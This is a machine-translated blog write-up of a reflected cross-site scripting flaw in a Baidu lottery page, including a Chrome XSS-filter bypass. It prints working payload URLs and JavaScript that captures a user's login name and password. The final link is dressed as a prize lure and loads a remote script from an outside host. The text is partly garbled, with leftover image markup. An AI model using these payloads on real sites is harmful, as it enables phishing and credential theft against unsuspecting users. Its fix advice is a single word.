A Cross-Site XSS vulnerability in Baidu can bypass chrome filter Protection

A Cross-Site XSS vulnerability in Baidu can bypass chrome filter Protection

It can be used as a chrome filter Bypass case, so let's talk about it.

Today, I opened the Baidu homepage and found that I could draw a lottery. So I clicked in and looked at it.
 

http://api.open.baidu.com/pae/ecosys/page/lottery?type=video&wd=xx&nowType=lottery&site=iqiyi

 

But I didn't get it for half a day, so I just clicked it and looked at it and found an xss. Try and discover

Type = video & wd = xx & nowType = lottery & site = iqiyi

These parameters do not filter double quotation marks. Unfortunately, the input content will still be intercepted by chrome xssfilter. Here we need to use the vector of chrome's complex parameter bypass.

Here I focus on the three lower parameters. site is a class that can be output in two different places.
 

http://api.open.baidu.com/pae/ecosys/page/lottery?type=video&wd=xx&nowType=lottery&site=iqiyi%27%22xxx

 

We can see that the output point is located in two places without filtering.

The common xss code is intercepted by chrome filter.
 

So how can we bypass it?

One previously studied variable output in two different places can pass the chrome vector.
 

">

 
http://api.open.baidu.com/pae/ecosys/page/lottery?type=video&wd=xx&nowType=lottery&site=iqiyi%22%3E%3Cimg%20src=%27onerror=alert(1)

 



Otherwise, there will be a .png later) which will lead to code errors. Can we use // to comment out the following code? The answer is no, and the test finds that it will be intercepted as long as the/interceptor is added, chrome is still doing well.

After thinking for a while, the brain hole is opened. Since we cannot comment the class content behind it, we can close it so that we won't report an error.

Finally, the following link is constructed:
 
http://api.open.baidu.com/pae/ecosys/page/lottery?type=video&wd=xx&nowType=lottery&site=iqiyi%22%3E%3Cimg%20src=x%20onerror=x={png:1};(function(){alert(location.href)})(x


The result is as follows:
 
VcnQwMS5qcGc = "src =" http://www.bkjia.com/uploads/allimg/150210/042624A46-4.jpg "width =" 600 "/>


Code closed successfully

Next, we will hijack the user's account and password (when the user does not log on, the user is too lazy to write). The hijacking code is as follows:
 
Var pass = ""; tangram?psp_9 _ password. onblur = function () {pass = this. value}; tangram1_psp_9 _ submit. onclick = function () {alert ('by xiangcao username:' + tangram?psp_9 _ userName. value + 'password: '+ pass)} // I will not write it when it is sent.


Finally, the constructed link
 
http://api.open.baidu.com/pae/ecosys/page/lottery?type=video&wd=xx&nowType=lottery&site=iqiyi">


Send out:

<A href = "http://api.open.baidu.com/pae/ecosys/page/lottery? Type = video & amp; wd = xx & amp; nowType = lottery & amp; site = iqiyi & quot; & gt; & lt; img % 20id = x % 20alt = with (body) appendChild (createElement (/script /. source )). src = & quot; // qqq. si/soPurw & quot; % 20src = % 27% 20 onerror = x = {png: 1}; (function () {eval (alt )}) (x "> hundreds of times of welfare benefits, come and grab it </a>

Result
 

 
Solution:
Filter